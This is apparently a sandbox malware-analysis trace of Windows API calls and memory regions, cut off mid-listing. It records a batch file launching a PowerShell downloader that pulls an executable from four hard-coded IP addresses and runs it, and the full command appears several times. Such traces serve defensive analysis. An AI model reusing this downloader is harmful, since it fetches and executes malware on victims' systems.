lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", nBufferLength=0x104, lpBuffer=0x399f70, lpFilePart=0x28f050 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat", lpFilePart=0x28f050*="tmp1971.bat") returned 0x30 [0052.779] SetErrorMode (uMode=0x0) returned 0x1 [0052.779] wcsspn (_String=" ", _Control=" \x09") returned 0x1 [0052.780] CmdBatNotification () returned 0x0 [0052.780] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp1971.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f0b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0052.780] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0052.780] _get_osfhandle (_FileHandle=3) returned 0x5c [0052.780] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0052.780] _get_osfhandle (_FileHandle=3) returned 0x5c [0052.780] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0052.780] ReadFile (in: hFile=0x5c, lpBuffer=0x49e9c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28eec0, lpOverlapped=0x0 | out: lpBuffer=0x49e9c320*, lpNumberOfBytesRead=0x28eec0*=0x1a0, lpOverlapped=0x0) returned 1 [0052.781] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e9c320, cbMultiByte=416, lpWideCharStr=0x49e9e320, cchWideChar=8191 | out: lpWideCharStr="powershell \"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe');}catch{$tig1=0;}return $tig1;}$mok1=@('193.187.172.11','46.173.218.240','193.187.172.42','46.173.218.83');foreach ($liu in $mok1){if(fmoke('http://'+$liu+'/uncle_sam.php') -eq 1){break;} } start-process 'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe';\r\n") returned 416 [0052.783] _get_osfhandle (_FileHandle=3) returned 0x5c [0052.783] GetFileType (hFile=0x5c) returned 0x1 [0052.783] _get_osfhandle (_FileHandle=3) returned 0x5c [0052.783] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0 [0052.783] _tell (_FileHandle=3) returned 416 [0052.783] _close (_FileHandle=3) returned 0 [0052.783] _vsnwprintf (in: _Buffer=0x49ea6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28ee58 | out: _Buffer="\r\n") returned 2 [0052.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0052.783] GetFileType (hFile=0x7) returned 0x2 [0052.784] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0052.784] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28ede8 | out: lpMode=0x28ede8) returned 1 [0052.784] _get_osfhandle (_FileHandle=1) returned 0x7 [0052.784] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49ea6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28ee28, lpReserved=0x0 | out: lpBuffer=0x49ea6340*, lpNumberOfCharsWritten=0x28ee28*=0x2) returned 1 [0052.784] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e8f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0052.784] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e9c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0052.784] _vsnwprintf (in: _Buffer=0x49e8eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28ee68 | out: _Buffer="C:\\Users\\aETAdzjz\\Desktop") returned 25 [0052.784] _vsnwprintf (in: _Buffer=0x49e8eb92, _BufferCount=0x3e5, _Format="%c", _ArgList=0x28ee68 | out: _Buffer=">") returned 1 [0052.784] _get_osfhandle (_FileHandle=1) returned 0x7 [0052.784] GetFileType (hFile=0x7) returned 0x2 [0052.784] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0052.784] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28ee18 | out: lpMode=0x28ee18) returned 1 [0052.784] _get_osfhandle (_FileHandle=1) returned 0x7 [0052.784] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e8eb60*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28ee58, lpReserved=0x0 | out: lpBuffer=0x49e8eb60*, lpNumberOfCharsWritten=0x28ee58*=0x1a) returned 1 [0052.785] _get_osfhandle (_FileHandle=1) returned 0x7 [0052.785] GetFileType (hFile=0x7) returned 0x2 [0052.785] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0052.785] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f0f8 | out: lpMode=0x28f0f8) returned 1 [0052.786] _get_osfhandle (_FileHandle=1) returned 0x7 [0052.786] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3947c0*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x28f138, lpReserved=0x0 | out: lpBuffer=0x3947c0*, lpNumberOfCharsWritten=0x28f138*=0xa) returned 1 [0052.786] _vsnwprintf (in: _Buffer=0x49ea6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f138 | out: _Buffer=" \"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe');}catch{$tig1=0;}return $tig1;}$mok1=@('193.187.172.11','46.173.218.240','193.187.172.42','46.173.218.83');foreach ($liu in $mok1){if(fmoke('http://'+$liu+'/uncle_sam.php') -eq 1){break;} } start-process 'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe'; ") returned 405 [0052.786] _get_osfhandle (_FileHandle=1) returned 0x7 [0052.786] GetFileType (hFile=0x7) returned 0x2 [0052.786] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0052.786] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f0c8 | out: lpMode=0x28f0c8) returned 1 [0052.786] _get_osfhandle (_FileHandle=1) returned 0x7 [0052.786] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49ea6340*, nNumberOfCharsToWrite=0x195, lpNumberOfCharsWritten=0x28f108, lpReserved=0x0 | out: lpBuffer=0x49ea6340*, lpNumberOfCharsWritten=0x28f108*=0x195) returned 1 [0052.787] _vsnwprintf (in: _Buffer=0x49ea6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f138 | out: _Buffer="\r\n") returned 2 [0052.787] _get_osfhandle (_FileHandle=1) returned 0x7 [0052.787] GetFileType (hFile=0x7) returned 0x2 [0052.787] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0052.787] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f0c8 | out: lpMode=0x28f0c8) returned 1 [0052.787] _get_osfhandle (_FileHandle=1) returned 0x7 [0052.787] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49ea6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f108, lpReserved=0x0 | out: lpBuffer=0x49ea6340*, lpNumberOfCharsWritten=0x28f108*=0x2) returned 1 [0052.787] _wcsicmp (_String1="powershell", _String2="DIR") returned 12 [0052.787] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11 [0052.787] _wcsicmp (_String1="powershell", _String2="DEL") returned 12 [0052.787] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4 [0052.787] _wcsicmp (_String1="powershell", _String2="COPY") returned 13 [0052.787] _wcsicmp (_String1="powershell", _String2="CD") returned 13 [0052.787] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13 [0052.787] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2 [0052.787] _wcsicmp (_String1="powershell", _String2="REN") returned -2 [0052.787] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11 [0052.787] _wcsicmp (_String1="powershell", _String2="SET") returned -3 [0052.787] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14 [0052.787] _wcsicmp (_String1="powershell", _String2="DATE") returned 12 [0052.788] _wcsicmp (_String1="powershell", _String2="TIME") returned -4 [0052.788] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3 [0052.788] _wcsicmp (_String1="powershell", _String2="MD") returned 3 [0052.788] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3 [0052.788] _wcsicmp (_String1="powershell", _String2="RD") returned -2 [0052.788] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2 [0052.788] _wcsicmp (_String1="powershell", _String2="PATH") returned 14 [0052.788] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9 [0052.788] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3 [0052.788] _wcsicmp (_String1="powershell", _String2="CLS") returned 13 [0052.788] _wcsicmp (_String1="powershell", _String2="CALL") returned 13 [0052.788] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6 [0052.788] _wcsicmp (_String1="powershell", _String2="VER") returned -6 [0052.788] _wcsicmp (_String1="powershell", _String2="VOL") returned -6 [0052.788] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11 [0052.788] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3 [0052.788] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11 [0052.788] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4 [0052.788] _wcsicmp (_String1="powershell", _String2="START") returned -3 [0052.788] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12 [0052.788] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5 [0052.788] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3 [0052.788] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6 [0052.788] _wcsicmp (_String1="powershell", _String2="POPD") returned 7 [0052.788] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15 [0052.788] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10 [0052.788] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14 [0052.788] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13 [0052.788] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3 [0052.788] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0052.789] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0052.789] GetStartupInfoW (in: lpStartupInfo=0x28e880 | out: lpStartupInfo=0x28e880*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0052.789] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1 [0052.791] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell \"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe');}catch{$tig1=0;}return $tig1;}$mok1=@('193.187.172.11','46.173.218.240','193.187.172.42','46.173.218.83');foreach ($liu in $mok1){if(fmoke('http://'+$liu+'/uncle_sam.php') -eq 1){break;} } start-process 'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe';", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Desktop", lpStartupInfo=0x28e7a0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="powershell \"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe');}catch{$tig1=0;}return $tig1;}$mok1=@('193.187.172.11','46.173.218.240','193.187.172.42','46.173.218.83');foreach ($liu in $mok1){if(fmoke('http://'+$liu+'/uncle_sam.php') -eq 1){break;} } start-process 'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe';", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28e750 | out: lpCommandLine="powershell \"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe');}catch{$tig1=0;}return $tig1;}$mok1=@('193.187.172.11','46.173.218.240','193.187.172.42','46.173.218.83');foreach ($liu in $mok1){if(fmoke('http://'+$liu+'/uncle_sam.php') -eq 1){break;} } start-process 'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe';", lpProcessInformation=0x28e750*(hProcess=0x58, hThread=0x5c, dwProcessId=0xa80, dwThreadId=0xa84)) returned 1 [0052.795] CloseHandle (hObject=0x5c) returned 1 [0052.795] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0052.795] GetEnvironmentStringsW () returned 0x398f20* [0052.795] FreeEnvironmentStringsW (penv=0x398f20) returned 1 [0052.795] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0104.641] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x28e698 | out: lpExitCode=0x28e698*=0x0) returned 1 [0104.641] CloseHandle (hObject=0x58) returned 1 [0104.641] _vsnwprintf (in: _Buffer=0x28e908, _BufferCount=0x13, _Format="%08X", _ArgList=0x28e6a8 | out: _Buffer="00000000") returned 8 [0104.641] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0104.641] GetEnvironmentStringsW () returned 0x39d880* [0104.642] FreeEnvironmentStringsW (penv=0x39d880) returned 1 [0104.642] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0104.642] GetEnvironmentStringsW () returned 0x39d880* [0104.642] FreeEnvironmentStringsW (penv=0x39d880) returned 1 [0104.642] DeleteProcThreadAttributeList (in: lpAttributeList=0x28e768 | out: lpAttributeList=0x28e768) [0104.642] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.642] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0104.643] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.643] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e8e194 | out: lpMode=0x49e8e194) returned 1 [0104.643] _get_osfhandle (_FileHandle=0) returned 0x3 [0104.643] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e8e198 | out: lpMode=0x49e8e198) returned 1 [0104.643] SetConsoleInputExeNameW () returned 0x1 [0104.643] GetConsoleOutputCP () returned 0x1b5 [0104.643] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e9bfe0 | out: lpCPInfo=0x49e9bfe0) returned 1 [0104.643] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0104.643] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp1971.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp1971.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f0b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0104.644] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0104.644] _get_osfhandle (_FileHandle=3) returned 0x58 [0104.644] SetFilePointer (in: hFile=0x58, lDistanceToMove=416, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0 [0104.644] _get_osfhandle (_FileHandle=3) returned 0x58 [0104.644] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0 [0104.644] ReadFile (in: hFile=0x58, lpBuffer=0x49e9c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28eec0, lpOverlapped=0x0 | out: lpBuffer=0x49e9c320*, lpNumberOfBytesRead=0x28eec0*=0x0, lpOverlapped=0x0) returned 1 [0104.644] GetLastError () returned 0x0 [0104.644] _get_osfhandle (_FileHandle=3) returned 0x58 [0104.644] GetFileType (hFile=0x58) returned 0x1 [0104.644] _get_osfhandle (_FileHandle=3) returned 0x58 [0104.644] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0 [0104.645] _get_osfhandle (_FileHandle=3) returned 0x58 [0104.645] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0 [0104.645] ReadFile (in: hFile=0x58, lpBuffer=0x49e9c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28ee90, lpOverlapped=0x0 | out: lpBuffer=0x49e9c320*, lpNumberOfBytesRead=0x28ee90*=0x0, lpOverlapped=0x0) returned 1 [0104.645] GetLastError () returned 0x0 [0104.645] _get_osfhandle (_FileHandle=3) returned 0x58 [0104.645] GetFileType (hFile=0x58) returned 0x1 [0104.645] _get_osfhandle (_FileHandle=3) returned 0x58 [0104.645] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0 [0104.645] longjmp () [0104.663] _tell (_FileHandle=3) returned 416 [0104.663] _close (_FileHandle=3) returned 0 [0104.663] CmdBatNotification () returned 0x0 [0104.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.663] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0104.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.663] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e8e194 | out: lpMode=0x49e8e194) returned 1 [0104.663] _get_osfhandle (_FileHandle=0) returned 0x3 [0104.663] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e8e198 | out: lpMode=0x49e8e198) returned 1 [0104.664] SetConsoleInputExeNameW () returned 0x1 [0104.664] GetConsoleOutputCP () returned 0x1b5 [0104.664] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e9bfe0 | out: lpCPInfo=0x49e9bfe0) returned 1 [0104.664] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0104.664] exit (_Code=0) Process: id = "5" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x36c53000" os_pid = "0xa80" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xa60" cmd_line = "powershell \"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe');}catch{$tig1=0;}return $tig1;}$mok1=@('193.187.172.11','46.173.218.240','193.187.172.42','46.173.218.83');foreach ($liu in $mok1){if(fmoke('http://'+$liu+'/uncle_sam.php') -eq 1){break;} } start-process 'C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe';" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 850 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 851 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 852 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 853 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 854 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 855 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 856 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 857 start_va = 0x13f7f0000 end_va = 0x13f866fff entry_point = 0x13f7f0000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 858 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 859 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 860 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 861 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 862 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 863 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 864 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 865 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 866 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 867 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 868 start_va = 0x140000 end_va = 0x146fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 869 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 870 start_va = 0x160000 end_va = 0x162fff entry_point = 0x160000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 871 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 872 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 873 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 874 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 875 start_va = 0x440000 end_va = 0x5c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 876 start_va = 0x5d0000 end_va = 0x750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 877 start_va = 0x760000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 878 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 879 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 880 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 881 start_va = 0x7fef3020000 end_va = 0x7fef308efff entry_point = 0x7fef3020000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 882 start_va = 0x7fefb760000 end_va = 0x7fefb778fff entry_point = 0x7fefb760000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 883 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 884 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 885 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 886 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 887 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 888 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 889 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 890 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 891 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 892 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 893 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 894 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 895 start_va = 0x1b60000 end_va = 0x1c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b60000" filename = "" Region: id = 896 start_va = 0x1c70000 end_va = 